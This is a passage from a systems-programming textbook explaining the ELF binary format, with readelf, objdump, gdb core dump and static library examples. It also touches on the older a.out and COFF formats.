Behind the process
131a.out is a very simple header format that only allows a single data, code and bss section. As you will
come to see, this is insufficient for modern systems with dynamic libraries.
COFF
The Common Object File Format, or COFF, was the precursor to ELF. It's header format was more flexible,
allowing an more (but limited) sections in the file.
COFF also has difficulties with elegant support of shared libraries, and ELF was selected as an alternative
implementation on Linux.
However, COFF lives on in Microsoft Windows as the Portable Executable  or PE format. PE is
to Windows as ELF is to Linux.
ELF
ELF is an extremely flexible format for representing binary code in a system. By following the ELF
standard you can represent a kernel binary just as easily as a normal executable or a system library. The
same tools can be used to inspect and operate on all ELF files and developers who understand the ELF file
format can translate their skills to most modern UNIX systems.
ELF in depth
ELF extends on COFF and gives the header sufficient flexibility to define an arbitrary number of sections,
each with it's own properties. This facilitates easier dynamic linking and debugging.
Behind the process
132Figure 8.1. ELF Overview
Header
Data
Header
Data
Header
Data
Header
DataHeader
ELF File Header
Overall, the file has a file header  which describes the file in general and then has pointers to each of the
individual sections that make up the file.
Behind the process
133Example 8.1. The ELF Header
  1 
                  typedef struct {
            unsigned char e_ident[EI_NIDENT];
            Elf32_Half    e_type;
  5         Elf32_Half    e_machine;
            Elf32_Word    e_version;
            Elf32_Addr    e_entry;
            Elf32_Off     e_phoff;
            Elf32_Off     e_shoff;
 10         Elf32_Word    e_flags;
            Elf32_Half    e_ehsize;
            Elf32_Half    e_phentsize;
            Elf32_Half    e_phnum;
            Elf32_Half    e_shentsize;
 15         Elf32_Half    e_shnum;
            Elf32_Half    e_shstrndx;
    } Elf32_Ehdr;
    
                
Above is the description as given in the API documentation. This is the layout of the C structure which
defines a ELF header.
Example 8.2. The ELF Header, as shown by readelf
  1 
                  $ readelf --header /bin/ls
    
    ELF Header:
  5   Magic:   7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 
      Class:                             ELF32
      Data:                              2's complement, big endian
      Version:                           1 (current)
      OS/ABI:                            UNIX - System V
 10   ABI Version:                       0
      Type:                              EXEC (Executable file)
      Machine:                           PowerPC
      Version:                           0x1
      Entry point address:               0x10002640
 15   Start of program headers:          52 (bytes into file)
      Start of section headers:          87460 (bytes into file)
      Flags:                             0x0
      Size of this header:               52 (bytes)
      Size of program headers:           32 (bytes)
 20   Number of program headers:         8
      Size of section headers:           40 (bytes)
      Number of section headers:         29
      Section header string table index: 28
    
 25   [...]
    
                
Behind the process
134Above is a more human readable form as present by the readelf program, which is part of GNU binutils.
The e_ident  array is the first thing at the start of any ELF file, and always starts with a few "magic"
bytes. The first byte is 0x7F and then the next three bytes are "ELF". You can inspect an ELF binary to
see this for yourself with something like the hexdump  command.
Example 8.3. Inspecting the ELF magic number
  1 
                  ianw@mingus:~$ hexdump -C /bin/ls | more
    00000000  7f 45 4c 46 01 02 01 00  00 00 00 00 00 00 00 00  |.ELF............|
    
  5 ... (rest of the program follows) ...
                
Note the 0x7F to start, then the ASCII encoded "ELF" string. Have a look at the standard and see what the
rest of the array defines and what the values are in a binary.
Next we have some flags for the type of machine this binary is created for. The first thing we can see is
that ELF defines different type sized versions, one for 32 bit and one for 64 bit versions; here we inspect
the 32 bit version. The difference is mostly that on 64 bit machines addresses obviously required to be
held in 64 bit variables. We can see that the binary has been created for a big endian machine that uses
2's complement to represent negative numbers. Skipping down a bit we can see the Machine  tells us this
is a PowerPC binary.
The apparently innocuous entry point address seems straight forward enough; this is the address in memory
that the program code starts at.
Beginning C programmers are told that main() is the first program called in your program. Using the entry
point address we can actually verify that it isn't.
Example 8.4. Investigating the entry point
  1 
                  $ cat test.c
    #include <stdio.h>
    
  5 int main(void)
    {
            printf("main is : %p\n", &main);
            return 0;
    }
 10 
    $ gcc -Wall -o test test.c
    
    $ ./test
    main is : 0x10000430
 15 
    $ readelf --headers ./test | grep 'Entry point'
      Entry point address:               0x100002b0
    
    $ objdump --disassemble ./test | grep 100002b0
 20 100002b0 <_start>:
    100002b0:       7c 29 0b 78     mr      r9,r1
Behind the process
135    
    
                
Above we can see that the entry point is actually a function called _start. Our program didn't define this
at all, and the leading underscore suggests that it is in a separate namespace . We examine how a program
starts up below.
After that the header contians pointers to where in the file other important parts of the ELF file start, like
a table of contents.
Symbols and Relocations
The ELF specification provides for symbol tables  which are simply mappings of strings (symbols) to
locations in the file. Symbols are required for linking; for example assigning a value to a variable foo
declared as extern int foo;  would require the linker to find the address of foo, which would involve
looking up "foo" in the symbol table and finding the address.
Closely related to symbols are relocations . A relocation is simply a blank space left to be patched up later.
In the previous example, until the address of foo is known it can not be used. However, on a 32-bit system,
we know the address of foo must be a 4-byte value, so any time the compiler needs to use that address (to
say, assign a value) it can simply leave 4-byes of blank space and keep a relocation that essentially says
to the linker "place the real value of "foo" into the 4 bytes at this address". As mentioned, this requires the
symbol "foo" to be resolved. the section called “Relocations”  contains further information on relocations.
Sections and Segments
The ELF format specifies two "views" of an ELF file -- that which is used for linking and that which is
used for execution. This affords significant flexibility for systems designers.
We talk about sections in object code waiting to be linked into an executable. One or more sections map
to a segment in the executable.
Segments
As we have done before, it is sometimes easier to look at the higher level of abstraction (segments) before
inspecting the lower layers.
As we mentioned the ELF file has an header that describes the overall layout of the file. The ELF header
actually points to another group of headers called the program headers . These headers describe to the
operating system anything that might be required for it to load the binary into memory and execute it.
Segments are described by program headers, but so are some other things reuquired to get the executable
running.
Example 8.5. The Program Header
  1 
                  typedef struct {
              Elf32_Word p_type;
              Elf32_Off  p_offset;
  5           Elf32_Addr p_vaddr;
              Elf32_Addr p_paddr;
              Elf32_Word p_filesz;
              Elf32_Word p_memsz;
Behind the process
136              Elf32_Word p_flags;
 10           Elf32_Word p_align;
    }
    
                
The definition of the program header is seen above. You might have noticed from the ELF header definition
above how there were fields e_phoff , e_phnum  and e_phentsize ; these are simply the offset in
the file where the program headers start, how many program headers there are and how big each program
header is. With these three bits of information you can easily find and read the program headers.
As we mentioned, program headers more than just segments. The p_type field defines just what the
program header is defining. For example, if this field is PT_INTERP  the header is defined as meaning
a string pointer to an interpreter  for the binary file. We discussed compiled versus interpreted languages
previously and made the distinction that a compiler builds a binary which can be run in a stand alone
fashion. Why should it need an interpreter? As always, the true picture is a little more complicated. There
are several reasons why a modern system wants flexibility when loading executable files, and to do this
some information can only be adequately acquired at the actual time the program is set up to run. We see
this in future chapters where we look into dynamic linking. Consequently some minor changes might need
to be made to the binary to allow it to work properly at runtime. Thus the usual interpreter of a binary file
is the dyanmic loader , so called because it takes the final steps to complete loading of the exectable and
prepare the binary image for running.
Segments are described with a value of PT_LOAD  in the p_type field. Each segment is then described
by the other fields in the program header. The p_offset  field tells you how far into the file on disk the
data for the segment is. The p_vaddr  field tells you what address that data is to live at in virtual memory
(p_addr describes the physical address, which is only really useful for small embedded systems that do
not implement virtual memory). The two flags p_filesz  and p_memsz  work to tell you how big the
segment is on disk and how big it should be in memory. If the memory size is greater than the disk size,
then the overlap should be filled with zeros. In this way you can save considerable space in your binaries
by not having to waste space for empty global variables. Finally p_flags  indicates the permissions on
the segment. Execute, read and write permissions can be specified in any combiation; for example code
segements should be marked as read and execute only, data sections as read and write with no exectue.
There are a few other segment types defined in the program headers, they are described more fully in the
standards specification (XXX).
Sections
As we have mentioned, sections make up segments. Sections are a way to organise the binary into logical
areas to communicate information between the compiler and the linker. In some special binaries, such as
the linux kernel, sections are used in more specific ways.
We've seen how segments utimatley come down to a blob of data in a file on disk with some descriptions
about where it should be loaded and what permissions it has. (XXX)
Sections have a similar header to segments.
Example 8.6. Sections
  1 
                  typedef struct {
              Elf32_Word sh_name;
              Elf32_Word sh_type;
Behind the process
137  5           Elf32_Word sh_flags;
              Elf32_Addr sh_addr;
              Elf32_Off  sh_offset;
              Elf32_Word sh_size;
              Elf32_Word sh_link;
 10           Elf32_Word sh_info;
              Elf32_Word sh_addralign;
              Elf32_Word sh_entsize;
    }
    
 15             
Sections have a few more types defined for the sh_type  field; for example a section of type
SH_PROGBITS  is defined as a section that hold binary data for use by the program. Other flags say if
this section is a symbol table (used by the linker or debugger for example) or maybe something for the
dynamic loader.
There are also more attributes, such as the allocate attribute which flags that this section will need memory
allocated for it.
It is probably best to examine sections through an example of them in use. Consier the following program.
Example 8.7. Sections
  1 
                  #include <stdio.h>
    
    int big_big_array[10*1024*1024];
  5 
    char *a_string = "Hello, World!";
    
    int a_var_with_value = 0x100;
    
 10 int main(void)
    {
     big_big_array[0] = 100;
     printf("%s\n", a_string);
     a_var_with_value += 20;
 15 }
    
                
Example 8.8. Sections readelf output
  1 
                  $ readelf --all ./sections
    ELF Header:
     ...
  5   Size of section headers:           40 (bytes)
      Number of section headers:         37
      Section header string table index: 34
    
    Section Headers:
 10   [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
Behind the process
138      [ 0]                   NULL            00000000 000000 000000 00      0   0  0
      [ 1] .interp           PROGBITS        10000114 000114 00000d 00   A  0   0  1
      [ 2] .note.ABI-tag     NOTE            10000124 000124 000020 00   A  0   0  4
      [ 3] .hash             HASH            10000144 000144 00002c 04   A  4   0  4
 15   [ 4] .dynsym           DYNSYM          10000170 000170 000060 10   A  5   1  4
      [ 5] .dynstr           STRTAB          100001d0 0001d0 00005e 00   A  0   0  1
      [ 6] .gnu.version      VERSYM          1000022e 00022e 00000c 02   A  4   0  2
      [ 7] .gnu.version_r    VERNEED         1000023c 00023c 000020 00   A  5   1  4
      [ 8] .rela.dyn         RELA            1000025c 00025c 00000c 0c   A  4   0  4
 20   [ 9] .rela.plt         RELA            10000268 000268 000018 0c   A  4  25  4
      [10] .init             PROGBITS        10000280 000280 000028 00  AX  0   0  4
      [11] .text             PROGBITS        100002b0 0002b0 000560 00  AX  0   0 16
      [12] .fini             PROGBITS        10000810 000810 000020 00  AX  0   0  4
      [13] .rodata           PROGBITS        10000830 000830 000024 00   A  0   0  4
 25   [14] .sdata2           PROGBITS        10000854 000854 000000 00   A  0   0  4
      [15] .eh_frame         PROGBITS        10000854 000854 000004 00   A  0   0  4
      [16] .ctors            PROGBITS        10010858 000858 000008 00  WA  0   0  4
      [17] .dtors            PROGBITS        10010860 000860 000008 00  WA  0   0  4
      [18] .jcr              PROGBITS        10010868 000868 000004 00  WA  0   0  4
 30   [19] .got2             PROGBITS        1001086c 00086c 000010 00  WA  0   0  1
      [20] .dynamic          DYNAMIC         1001087c 00087c 0000c8 08  WA  5   0  4
      [21] .data             PROGBITS        10010944 000944 000008 00  WA  0   0  4
      [22] .got              PROGBITS        1001094c 00094c 000014 04 WAX  0   0  4
      [23] .sdata            PROGBITS        10010960 000960 000008 00  WA  0   0  4
 35   [24] .sbss             NOBITS          10010968 000968 000000 00  WA  0   0  1
      [25] .plt              NOBITS          10010968 000968 000060 00 WAX  0   0  4
      [26] .bss              NOBITS          100109c8 000968 2800004 00  WA  0   0  4
      [27] .comment          PROGBITS        00000000 000968 00018f 00      0   0  1
      [28] .debug_aranges    PROGBITS        00000000 000af8 000078 00      0   0  8
 40   [29] .debug_pubnames   PROGBITS        00000000 000b70 000025 00      0   0  1
      [30] .debug_info       PROGBITS        00000000 000b95 0002e5 00      0   0  1
      [31] .debug_abbrev     PROGBITS        00000000 000e7a 000076 00      0   0  1
      [32] .debug_line       PROGBITS        00000000 000ef0 0001de 00      0   0  1
      [33] .debug_str        PROGBITS        00000000 0010ce 0000f0 01  MS  0   0  1
 45   [34] .shstrtab         STRTAB          00000000 0011be 00013b 00      0   0  1
      [35] .symtab           SYMTAB          00000000 0018c4 000c90 10     36  65  4
      [36] .strtab           STRTAB          00000000 002554 000909 00      0   0  1
    Key to Flags:
      W (write), A (alloc), X (execute), M (merge), S (strings)
 50   I (info), L (link order), G (group), x (unknown)
      O (extra OS processing required) o (OS specific), p (processor specific)
    
    There are no section groups in this file.
     ...
 55 
    Symbol table '.symtab' contains 201 entries:
       Num:    Value  Size Type    Bind   Vis      Ndx Name
    ...
        99: 100109cc 0x2800000 OBJECT  GLOBAL DEFAULT   26 big_big_array
 60 ...
       110: 10010960     4 OBJECT  GLOBAL DEFAULT   23 a_string
    ...
       130: 10010964     4 OBJECT  GLOBAL DEFAULT   23 a_var_with_value
    ...
Behind the process
139 65    144: 10000430    96 FUNC    GLOBAL DEFAULT   11 main
    
                
Above we have stripped some parts of the readelf output for clarity. We can analyse each part of our simple
program and see what happens to it.
Firstly, let us look at the variable big_big_array , which as the name suggests is a fairly large global
array. If we skip down to the symbol table we can see that the variable is at location 0x100109cc  which
we can correlate to the .bss section in the section listing, since it starts just below it at 0x100109c8 .
Note the size, and how it is quite large. We mentioned that BSS is a standard part of a binary image since
it would be silly to require that binary on disk have 10 megabytes of space allocated to it, when all of
that space is going to be zero. Note that this section has a type of NOBITS meaning that it does not have
any bytes on disk.
Thus the .bss section is defined for global variables whose value should be zero when the program starts.
We have seen how the memory size can be different to the on disk size in our discussion of segments;
variables being in the .bss section are an indication that they will be given zero value on program start.
The a_string  variable lives in the .sdata section, which stands for small data . Small data (and the
corresponding .sbss section) are sections that can be reached by an offset from some known pointer.
This means it is much faster to get to data in the sections as there are no extra lookups and loading of
addresses into memory required. On the other hand, most architectures are limited to the size of immediate
values you can add to a register (e.g. saying r1 = add r2, 70;  70 is an immediate value, as opposed
to say, adding two values stored in registers r1 = add r2,r3 ) and can thus only offset a certain "small"
distance from an address (XXX).
We can also see that our a_var_with_value  lives in the same place.
main however lives in the .text section, as we expect (remeber the name "text" and "code" are used
interchanably to refer to a program in memory.
Sections and Segments together
Example 8.9. Sections and Segments
  1 
                  $ readelf --segments /bin/ls
    
    Elf file type is EXEC (Executable file)
  5 Entry point 0x100026c0
    There are 8 program headers, starting at offset 52
    
    Program Headers:
      Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
 10   PHDR           0x000034 0x10000034 0x10000034 0x00100 0x00100 R E 0x4
      INTERP         0x000154 0x10000154 0x10000154 0x0000d 0x0000d R   0x1
          [Requesting program interpreter: /lib/ld.so.1]
      LOAD           0x000000 0x10000000 0x10000000 0x14d5c 0x14d5c R E 0x10000
      LOAD           0x014d60 0x10024d60 0x10024d60 0x002b0 0x00b7c RWE 0x10000
 15   DYNAMIC        0x014f00 0x10024f00 0x10024f00 0x000d8 0x000d8 RW  0x4
      NOTE           0x000164 0x10000164 0x10000164 0x00020 0x00020 R   0x4
      GNU_EH_FRAME   0x014d30 0x10014d30 0x10014d30 0x0002c 0x0002c R   0x4
      GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
Behind the process
140    
 20  Section to Segment mapping:
      Segment Sections...
       00
       01     .interp
       02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_ r .rela.dyn .rela.plt .init .text .fini .rodata .eh_frame_hdr
 25    03     .data .eh_frame .got2 .dynamic .ctors .dtors .jcr .got .sdata .sbss .p lt .bss
       04     .dynamic
       05     .note.ABI-tag
       06     .eh_frame_hdr
       07
 30 
                
readelf  shows us the segments and section mappings in the ELF file for the binary /bin/ls .
Skipping to the bottom of the output, we can see what sections have been moved into what segments. So,
for example the .interp  section is placed into an INTERP flagged segment. Notice that readelf tells
us it is requesting the interpreter /lib/ld.so.1 ; this is the dynamic linker which is run to prepare the
binary for execution.
Looking at the two LOAD segments we can see the distinction between text and data. Notice how the
first one has only "read" and "execute" permissions, whilst the next one has read, write and execute
permissions? These describe the code (r/w) and data (r/w/e) segments.
But data should not need to be executable! Indeed, on most architectures (for example, the most common
x86) the data section will not be marked as having the data section executable. However, the example
output above was taken from a PowerPC machine which has a slightly different programming model (ABI,
see below) requiring that the data section be executable 3. Such is the life of a systems programmer, where
rules were made to be broken!
The other intereseting thing to note is that the file size is the same as the memory size for the code segment,
however memory size is greater than the file size for the data segment. This comes from the BSS section
which holds zeroed global variables.
Debugging
Tradionally the primary method of post mortem debugging is referred to as the core dump . The term core
comes from the original physical characteristics of magnetic core memory, which uses the orientation of
small magnetic rings to store state.
Thus a core dump is simply a complete snapshot of the program as it was running at a particular time.
A debugger  can then be used to examine this dump and reconstruct the program state. Example 8.10,
“Example of creating a core dump and using it with gdb TM” shows a sample program that writes to a
random memory location in order to force a crash. At this point the processes will be halted and a dump
of the current state is recorded.
Example 8.10. Example of creating a core dump and using it with gdb TM
  1 
                  $ cat coredump.c
3For those that are curious, the PowerPC ABI calls stubs for functions in dynamic libraries directly in the GOT, rather than having them bounce
through a seperate PLT entry. Thus the processor needs exectute permissions for the GOT section, which you can see is embedded in the data
segment. This should make sense after reading the dyanmic linking chapter!
Behind the process
141    int main(void) {
     char *foo = (char*)0x12345;
  5  *foo = 'a';
    
     return 0;
    }
    
 10 $ gcc -Wall -g -o coredump coredump.c
    
    $ ./coredump
    Segmentation fault (core dumped)
    
 15 $ file ./core
    ./core: ELF 32-bit LSB core file Intel 80386, version 1 (SYSV), SVR4-style, from './coredump'
    
    $ gdb ./coredump
    ...
 20 (gdb) core core
    [New LWP 31614]
    Core was generated by `./coredump'.
    Program terminated with signal 11, Segmentation fault.
    #0  0x080483c4 in main () at coredump.c:3
 25 3  *foo = 'a';
    (gdb)
    
                
Symbols and Debugging Information
As the example shows, the debugger gdb TM requires the original executable and the core dump to provide
the debugging session. Note that the original executable was built with the -g flag, which instructs the
compiler to include all debugging information . Debugging information created by the compiler and is kept
in special sections of the ELF file. It describes in detail things like what register values currently hold
which variables used in the code, size of variables, length of arrays, etc. It is generally in the standard
DWARF format (a pun on the homonym ELF).
Including debugging information can make executable files and libraries very large; although this data is
not required resident in memory for actually running it can still take up considerable disk space. Thus the
usual process is to strip this information from the ELF file. While it is possible to arrange for shipping
of both stripped and unstripped files, most all current binary distribution methods provide the debugging
information in separate files. The objcopy TM tool can be used to extract the debugging information ( --
only-keep-debug ) and then add a link in the original executable to this stripped information ( --add-
gnu-debuglink ). After this is done, a special section called .gnu_debuglink  will be present in the
original executable, which contains a hash so that when a debugging sessions starts the debugger can be
sure it associates the right debugging information with the right executable.
Example 8.11. Example of stripping debugging information into separate files using
objcopyTM
  1 
                  $ gcc -g -shared -o libtest.so libtest.c
    $ objcopy --only-keep-debug libtest.so libtest.debug
    $ objcopy --add-gnu-debuglink=libtest.debug libtest.so
  5 $ objdump -s -j .gnu_debuglink libtest.so
Behind the process
142    
    libtest.so:     file format elf32-i386
    
    Contents of section .gnu_debuglink:
 10  0000 6c696274 6573742e 64656275 67000000  libtest.debug...
     0010 52a7fd0a                             R... 
    
                
Symbols take up much less space, but are also targets for removal from final output. Once the individual
object files of an executable are linked into the single final image there is generally no need for most
symbols to remain. As discussed in the section called “Symbols and Relocations”  symbols are required
to fix up relocation entries, but once this is done the symbols are not strictly necessary for running the
final program. On Linux the GNU toolchain strip TM program provides options to remove symbols. Note
that some symbols are required to be resolved at run-time (for dynamic linking , the focus of Chapter 9,
Dynamic Linking ) but these are put in separate dynamic symbol tables so they will not be removed and
render the final output useless.
Inside coredumps
A coredump is really just another ELF file; this illustrates the flexibility of ELF as a binary format.
Example 8.12. Example of using readelf TM and eu-readelf TM to examine a coredump.
  1 
                  $ readelf --all ./core
    ELF Header:
      Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  5   Class:                             ELF32
      Data:                              2's complement, little endian
      Version:                           1 (current)
      OS/ABI:                            UNIX - System V
      ABI Version:                       0
 10   Type:                              CORE (Core file)
      Machine:                           Intel 80386
      Version:                           0x1
      Entry point address:               0x0
      Start of program headers:          52 (bytes into file)
 15   Start of section headers:          0 (bytes into file)
      Flags:                             0x0
      Size of this header:               52 (bytes)
      Size of program headers:           32 (bytes)
      Number of program headers:         15
 20   Size of section headers:           0 (bytes)
      Number of section headers:         0
      Section header string table index: 0
    
    There are no sections in this file.
 25 
    There are no sections to group in this file.
    
    Program Headers:
      Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
 30   NOTE           0x000214 0x00000000 0x00000000 0x0022c 0x00000     0
Behind the process
143      LOAD           0x001000 0x08048000 0x00000000 0x01000 0x01000 R E 0x1000
      LOAD           0x002000 0x08049000 0x00000000 0x01000 0x01000 RW  0x1000
      LOAD           0x003000 0x489fc000 0x00000000 0x01000 0x1b000 R E 0x1000
      LOAD           0x004000 0x48a17000 0x00000000 0x01000 0x01000 R   0x1000
 35   LOAD           0x005000 0x48a18000 0x00000000 0x01000 0x01000 RW  0x1000
      LOAD           0x006000 0x48a1f000 0x00000000 0x01000 0x153000 R E 0x1000
      LOAD           0x007000 0x48b72000 0x00000000 0x00000 0x01000     0x1000
      LOAD           0x007000 0x48b73000 0x00000000 0x02000 0x02000 R   0x1000
      LOAD           0x009000 0x48b75000 0x00000000 0x01000 0x01000 RW  0x1000
 40   LOAD           0x00a000 0x48b76000 0x00000000 0x03000 0x03000 RW  0x1000
      LOAD           0x00d000 0xb771c000 0x00000000 0x01000 0x01000 RW  0x1000
      LOAD           0x00e000 0xb774d000 0x00000000 0x02000 0x02000 RW  0x1000
      LOAD           0x010000 0xb774f000 0x00000000 0x01000 0x01000 R E 0x1000
      LOAD           0x011000 0xbfeac000 0x00000000 0x22000 0x22000 RW  0x1000
 45 
    There is no dynamic section in this file.
    
    There are no relocations in this file.
    
 50 There are no unwind sections in this file.
    
    No version information found in this file.
    
    Notes at offset 0x00000214 with length 0x0000022c:
 55   Owner                 Data size Description
      CORE                 0x00000090 NT_PRSTATUS (prstatus structure)
      CORE                 0x0000007c NT_PRPSINFO (prpsinfo structure)
      CORE                 0x000000a0 NT_AUXV (auxiliary vector)
      LINUX                0x00000030 Unknown note type: (0x00000200)
 60 
    $ eu-readelf -n ./core
    
    Note segment of 556 bytes at offset 0x214:
      Owner          Data size  Type
 65   CORE                 144  PRSTATUS
        info.si_signo: 11, info.si_code: 0, info.si_errno: 0, cursig: 11
        sigpend: <>
        sighold: <>
        pid: 31614, ppid: 31544, pgrp: 31614, sid: 31544
 70     utime: 0.000000, stime: 0.000000, cutime: 0.000000, cstime: 0.000000
        orig_eax: -1, fpvalid: 0
        ebx:     1219973108  ecx:     1243440144  edx:              1
        esi:              0  edi:              0  ebp:     0xbfecb828
        eax:          74565  eip:     0x080483c4  eflags:  0x00010286
 75     esp:     0xbfecb818
        ds: 0x007b  es: 0x007b  fs: 0x0000  gs: 0x0033  cs: 0x0073  ss: 0x007b
      CORE                 124  PRPSINFO
        state: 0, sname: R, zomb: 0, nice: 0, flag: 0x00400400
        uid: 1000, gid: 1000, pid: 31614, ppid: 31544, pgrp: 31614, sid: 31544
 80     fname: coredump, psargs: ./coredump 
      CORE                 160  AUXV
        SYSINFO: 0xb774f414
        SYSINFO_EHDR: 0xb774f000
        HWCAP: 0xafe8fbff  <fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss tm pbe>
Behind the process
144 85     PAGESZ: 4096
        CLKTCK: 100
        PHDR: 0x8048034
        PHENT: 32
        PHNUM: 8
 90     BASE: 0
        FLAGS: 0
        ENTRY: 0x8048300
        UID: 1000
        EUID: 1000
 95     GID: 1000
        EGID: 1000
        SECURE: 0
        RANDOM: 0xbfecba1b
        EXECFN: 0xbfecdff1
100     PLATFORM: 0xbfecba2b
        NULL
      LINUX                 48  386_TLS
        index: 6, base: 0xb771c8d0, limit: 0x000fffff, flags: 0x00000051
        index: 7, base: 0x00000000, limit: 0x00000000, flags: 0x00000028
105     index: 8, base: 0x00000000, limit: 0x00000000, flags: 0x00000028
    
                
In Example 8.12, “Example of using readelf TM and eu-readelf TM to examine a coredump.”  we can see an
examination of the core file produced by Example 8.10, “Example of creating a core dump and using it with
gdbTM” using firstly the readelf TM tool. There are no sections, relocations or other extraneous information
in the file that may be required for loading an executable or library; it simply consists of a series of program
headers describing LOAD segments. These segments are raw data dumps, created by the kernel, of the
current memory allocations.
The other component of the core dump is the NOTE sections which contain data necessary for debugging
but not necessarily captured in straight snapshot of the memory allocations. The eu-readelf TM program
used in the second part of the figure provides a more complete view of the data by decoding it.
The PRSTATUS  note gives a range of interesting information about the process as it was running; for
example we can see from cursig that the program received a signal 11, or segmentation fault, as we
would expect. Along with process number information, it also includes a dump of all the current registers.
Given the register values, the debugger can reconstruct the stack state and hence provide a backtrace ;
combined with the symbol and debugging information from the original binary the debugger can show
exactly how you reached the current point of execution.
Another interesting output is the current auxiliary vector  (AUXV), discussed in the section called “Kernel
communication to programs” . The 386_TLS  describes global descriptor table  entries used for the x86
implementation of thread-local storage  (see the section called “Fast System Calls”  for more information
on use of segmentation, and the section called “Threads”  for information on threads4).
The kernel creates the core dump file within the bounds of the current ulimit settings — since a program
using a lot of memory could result in a very large dump, potentially filling up disk and making problems
even worse, generally the ulimit is set low or even at zero, since most non-developers have little use
for a core dump file. However the core dump remains the single most useful way to debug an unexpected
situation in a postmortem fashion.
4For a multi-threaded application, there would be duplicate entries for each thread running. The debugger will understand this, and it is how gdb TM
implements the thread command to show and switch between threads.
Behind the process
145ELF Executables
Executables are of course one of the primary uses of the ELF format. Contained within the binary is
everything required for the operating system to execute the code as intended.
Since an executable is designed to be run in a process with a unique address space (see Chapter 6, Virtual
Memory) the code can make assumptions about where the various parts of the program will be loaded in
memory. Example 8.13, “Segments of an executable file”  shows an example using the readelf TM tool to
examine the segments of an executable file. We can see the virtual addresses at which the LOAD segments
are required to be placed at. We can further see that one segment is for code — it has read and execute
permissions only — and one is for data, unsurprisingly with read and write permissions, but importantly no
execute permissions (without execute permissions, even if a bug allowed an attacker to introduce arbitrary
data the pages backing it would not be marked with execute permissions, and most processors will hence
disallow any execution of code in those pages).
Example 8.13. Segments of an executable file
  1 
                  $ readelf --segments /bin/ls
    
    Elf file type is EXEC (Executable file)
  5 Entry point 0x4046d4
    There are 8 program headers, starting at offset 64
    
    Program Headers:
      Type           Offset             VirtAddr           PhysAddr
 10                  FileSiz            MemSiz              Flags  Align
      PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040
                     0x00000000000001c0 0x00000000000001c0  R E    8
      INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200
                     0x000000000000001c 0x000000000000001c  R      1
 15       [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
      LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                     0x0000000000019ef4 0x0000000000019ef4  R E    200000
      LOAD           0x000000000001a000 0x000000000061a000 0x000000000061a000
                     0x000000000000077c 0x0000000000001500  RW     200000
 20   DYNAMIC        0x000000000001a028 0x000000000061a028 0x000000000061a028
                     0x00000000000001d0 0x00000000000001d0  RW     8
      NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c
                     0x0000000000000044 0x0000000000000044  R      4
      GNU_EH_FRAME   0x0000000000017768 0x0000000000417768 0x0000000000417768
 25                  0x00000000000006fc 0x00000000000006fc  R      4
      GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                     0x0000000000000000 0x0000000000000000  RW     8
    
     Section to Segment mapping:
 30   Segment Sections...
       00     
       01     .interp 
       02     .interp .note.ABI-tag .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 
       03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss 
 35    04     .dynamic 
       05     .note.ABI-tag .note.gnu.build-id 
Behind the process
146       06     .eh_frame_hdr 
       07     
    
 40             
The program segments must be loaded at these addresses; the last step of the linker is to resolve most
relocations ( the section called “Symbols and Relocations” ) and patch them with the assumed absolute
addresses — the data describing the relocation is then discarded in the final binary and there is no longer
a way to find this information.
In reality, executables generally have external dependencies on shared libraries , or pieces of common
code abstracted and shared among the entire system — almost all of the confusing parts of Example 8.13,
“Segments of an executable file”  relate to the use of shared libraries. Libraries are discussed in the section
called “Libraries” , dynamic libraries in Chapter 9, Dynamic Linking .
Libraries
Developers soon tired of having to write everything from scratch, so one of the first inventions of computer
science was libraries.
A library is simply a collection of functions which you can call from your program. Obviously a library
has many advantages, not least of which is that you can save much time by reusing work someone else has
already done and generally be more confident that it has fewer bugs (since probably many other people
use the libraries too, and you benefit from having them finding and fixing bugs). A library is exactly like
an executable, except instead of running directly the library functions are invoked with parameters from
your executable.
Static Libraries
The most straight forward way of using a library function is to have the object files from the library
linked directly into your final executable, just as with those you have compiled yourself. When linked like
this the library is called a static library, because the library will remain unchanged unless the program
is recompiled.
This is the most straight forward way of using a library as the final result is a simple executable with no
dependencies.
Inside static libraries
A static library is simply a group of object files. The object files are kept in an archive, which leads to their
usual .a suffix extension. You can think of archives as similar to a zip file, but without compression.
Below we show the creation of basic static library and introduce some common tools for working with
libraries.
Example 8.14. Creating and using a static library
  1 
                  $ cat library.c
    /* Library Function */
    int function(int input)
  5 {
            return input + 10;
    }
Behind the process
147    
    $ cat library.h
 10 /* Function Definition */
    int function(int);
    
    $ cat program.c
    #include <stdio.h>
 15 /* Library header file */
    #include "library.h"
    
    int main(void)
    {
 20         int d = function(100);
    
            printf("%d\n", d);
    }
    
 25 $ gcc -c library.c
    $ ar rc libtest.a library.o
    $ ranlib ./libtest.a
    $ nm --print-armap ./libtest.a
    
 30 Archive index:
    function in library.o
    
    library.o:
    00000000 T function
 35 
    $ gcc -L . program.c -ltest -o program
    
    $ ./program
    110
 40 
                
Firstly we compile or library to an object file, just as we have seen in the previous chapter.
Notice that we define the library API in the header file. The API consists of function definitions for the
functions in the library; this is so that the compiler knows what types the functions take when building
object files that reference the library (e.g. program.c , which #include s the header file).
We create the library ar (short for "archive") command. By convention static library file names are prefixed
with lib and have the extension .a. The c argument tells the program to create the archive, and a tells
archive to add the object files specified into the library file.5
Next we use the ranlib application to make a header in the library with the symbols of the object file
contents. This helps the compiler to quickly reference symbols; in the case where we just have one this
step may seem a little redundant; however a large library may have thousands of symbols meaning an
index can significantly speed up finding references. We inspect this new header with the nm application.
We see the function  symbol for the function()  function at offset zero, as we expect.
